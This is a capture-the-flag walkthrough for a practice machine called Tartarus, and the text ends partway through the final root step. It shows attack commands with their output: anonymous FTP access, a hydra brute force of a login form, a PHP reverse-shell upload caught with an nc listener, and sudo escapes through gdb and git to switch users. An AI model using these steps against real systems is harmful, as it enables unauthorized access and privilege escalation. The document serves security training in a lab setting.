Tartarus is a beginner box. This box involves a lot of interesting things including horizontal and vertical privilege escalation, changing shells as well as popping reverse shell.
Initial Foothold
The first thing post deploying the machine that we can do is visit the IP address and check for any information that we can use.
We can see a default Apache page and nothing else. Also, we ca go one step further and check it's source code but even over there we can't find any useful information. So, we can move on and run an nmap scan along with a directory brute force attack.
tester@kali:~/Downloads/tartarus$ nmap -A 10.10.39.48
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 16:05 IST
Nmap scan report for 10.10.39.48
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.91.135
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
| 256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_ 256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.75 seconds
From the nmap scan, we ca see that FTP is open that too with anonymous login enabled. We can immediately go and check if we can find something over there.
tester@kali:~/Downloads/tartarus$ ftp 10.10.39.48
Connected to 10.10.39.48.
220 (vsFTPd 3.0.3)
Name (10.10.39.48:tester): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ...
-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
226 Directory send OK.
ftp> mget test.txt
mget test.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (17 bytes).
226 Transfer complete.
17 bytes received in 0.00 secs (134.9720 kB/s)
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
-rw-r--r-- 1 ftp ftp 14 Jul 05 21:45 yougotgoodeyes.txt
226 Directory send OK.
ftp> mget yougotgoodeyes.txt
mget yougotgoodeyes.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for yougotgoodeyes.txt (14 bytes).
226 Transfer complete.
14 bytes received in 0.00 secs (76.3792 kB/s)
ftp>
Here, right in front of us we can see a file named test.txt which we can easily download using mget. Also, there is one odd directory present over here which is .... Usually, . is for current directory and .. is for the parent directory but there is nothing like ..., so we can go and check that directory. Going further in that directory we can find a file named yougotgoodeyes.txt, we can download this as well with the same mget command.
tester@kali:~/Downloads/tartarus$ cat test.txt
vsftpd test file
tester@kali:~/Downloads/tartarus$ cat yougotgoodeyes.txt
/sUp3r-s3cr3t
The 'text.txt was not of help but the other txt file gave us a hint on a hidden directory /sUp3r-s3cr3t. We can go and check what is present over there.
We can see that a login page is hosted over here. We can try some basic SQLi attack as well as check it's source-code for some sort of information leakage but we can't find anything useful over here. Meanwhile, our directory brute force attack would've been completed.
And we can see that robots.txt file was detected. So, can go there and check if some information is available over there.
User-Agent: *
Disallow : /admin-dir
I told d4rckh we should hide our things deep
We can see that /admin-dir has been disallowed but for the robots we can definitely and check it out.
We can see there are two files, userid and credentials.txt. We can open them and save both the files. It appears that userid contains a list of usernames and credentials.txt contains a list of passwords. We can use these files along with hydra to brute force login on the /sUp3r-s3cr3t login page.
While trying to login with default credentials and SQLi attacks, I observed that the requests were taking me to sUp3r-s3cr3t\authenticate.php. Hence, we must use this path to perform the brute force attack.
tester@kali:~/Downloads/tartarus$ hydra -L userid -P credentials.txt 10.10.39.48 http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-20 16:28:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1313 login tries (l:13/p:101), ~83 tries per task
[DATA] attacking http-post-form://10.10.39.48:80/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect
[80][http-post-form] host: 10.10.39.48 login: **** password: ************
[STATUS] 1153.00 tries/min, 1153 tries in 00:01h, 160 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-20 16:29:30
In the above hydra command, we have used the userid file for brute forcing usernames using the switch -L and the credentials.txt for passwords using the switch -P. For specifying that we are brute forcing a login page, we have used http-post-form and passed on our authentication page's path and other parameters. The Incorrect* helps to filter out those requests that returned either Incorrect username or Incorrect password and we get the only correct credential pair in the output.
We can now use these credentials to login on the page.
Here, we can upload a file and as this is apache based we can search on the internet for php reverse shell files and use them to gain access to the machine. Once such file can be found here. All we need to do is make some changes to this file and we are ready to go.
Here, we need to enter our local IP address on which we intend to get the reverse shell connection. Also, we can change the $shell to get a shell that we want. Here, I have changed /bin/sh to /bin/bash.
Once, we upload this file we need to open it but we don't know where it is stored. So, we can run a directory brute force attack on the /sUp3r-s3cr3t directory.
tester@kali:~/Downloads/tartarus$ dirb http://10.10.39.48/sUp3r-s3cr3t
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Sep 20 16:43:16 2020
URL_BASE: http://10.10.39.48/sUp3r-s3cr3t/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.39.48/sUp3r-s3cr3t/ ----
==> DIRECTORY: http://10.10.39.48/sUp3r-s3cr3t/images/
+ http://10.10.39.48/sUp3r-s3cr3t/index.html (CODE:200|SIZE:732)
---- Entering directory: http://10.10.39.48/sUp3r-s3cr3t/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Sep 20 16:56:03 2020
DOWNLOADED: 4612 - FOUND: 1
Here, we can see a sub-directory named images has been detected. We can go and check it out.
Over there, we can see another sub-directory named uploads which contains our uploaded file re.php. Now, all that we need to do is start a listener using netcat on our machine using the command nc -nvlp 9090 and open the file re.php.
tester@kali:~/Downloads/tartarus$ nc -nvlp 9090
listening on [any] 9090 ...
connect to [10.8.91.135] from (UNKNOWN) [10.10.39.48] 52454
Linux ubuntu-xenial 4.4.0-184-generic #214-Ubuntu SMP Thu Jun 4 10:14:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:31:34 up 1:04, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-xenial:/$ whoami
www-data
www-data@ubuntu-xenial:/$ pwd
/
We can go to /home directory and see the different users on the machine.
And in the user d4rckh's we can find our user.txt flag.
Privilege Escalation
We can move on to user cleanup's directory now:
www-data@ubuntu-xenial:/home/d4rckh$ cd ../cleanup
www-data@ubuntu-xenial:/home/cleanup$ ls -lala
total 8
drwxr-xr-x 2 root root 4096 Jul 5 21:35 .
drwxr-xr-x 5 root root 4096 Jul 5 21:45 ..
But we can't find anything over here. We can also check user thirtytwo's directory:
www-data@ubuntu-xenial:/home/cleanup$ cd ../thirtytwo
www-data@ubuntu-xenial:/home/thirtytwo$ ls -la
la
total 16
drwxr-xr-x 2 thirtytwo thirtytwo 4096 Jul 5 21:38 .
drwxr-xr-x 5 root root 4096 Jul 5 21:45 ..
-rw------- 1 1002 1002 56 Jul 5 21:39 .bash_history
-rwxr-xr-x 1 root root 143 Jul 5 21:45 note.txt
www-data@ubuntu-xenial:/home/thirtytwo$ cat note.txt
Hey 32, the other day you were unable to clone my github repository.
Now you can use git. Took a while to fix it but now its good :)
~D4rckh
Here, we can see a note from d4rckh that user thirtytwo can run the command git with d4rckh's privilege level. So, for that we need to first check which commands do we have access to using the command sudo -l.
www-data@ubuntu-xenial:/home$ sudo -l
Matching Defaults entries for www-data on ubuntu-xenial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-xenial:
(thirtytwo) NOPASSWD: /var/www/gdb
Not as sudo, but we can run the command /var/www/gdb as user thirtytwo. We can look for gdb command in GTFOBins and find a sudo command for the same over there that we can modify a bit and use.
sudo /var/www/gdb -nx -ex '!sh' -ex quit
But this command didn't work because with sudo we try to run the command as root. But from sudo -l we can see that we are allowed to run this command as user thirtytwo and not root. So, we need to use the command:
www-data@ubuntu-xenial:/home$ sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
whoami
thirtytwo
Now, we can check the commands that user thirtywo can run:
sudo -l
Matching Defaults entries for thirtytwo on ubuntu-xenial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User thirtytwo may run the following commands on ubuntu-xenial:
(d4rckh) NOPASSWD: /usr/bin/git
As we found in the note, we can run the git command as user d4rckh now. So, we can again go to GTFOBins and look for exploit related to git. The one that works from the sudo exploits mentioned there after modification are:
sudo -u d4rckh /usr/bin/git -p help config
!/bin/sh
We can run these commands as user thirtytwo and get access to d4rckh's shell but before that we need to get into a bash shell which we get using a python command:
thirtytwo@ubuntu-xenial:~$ sudo -u d4rckh git -p help config
WARNING: terminal is not fully functional
RETURN)!/bin/sh
!/bin/sh
$ whoami
d4rckh
We can again get a bash shell using the same python command used above for user d4rckh. In his directory we can see a python script named cleanup.py which can be executed as root.
We can modify the content of this file to run a command to store the root flag in the tmp directory. First, we need to create a blank file in /tmp and give access of that file to others as well.
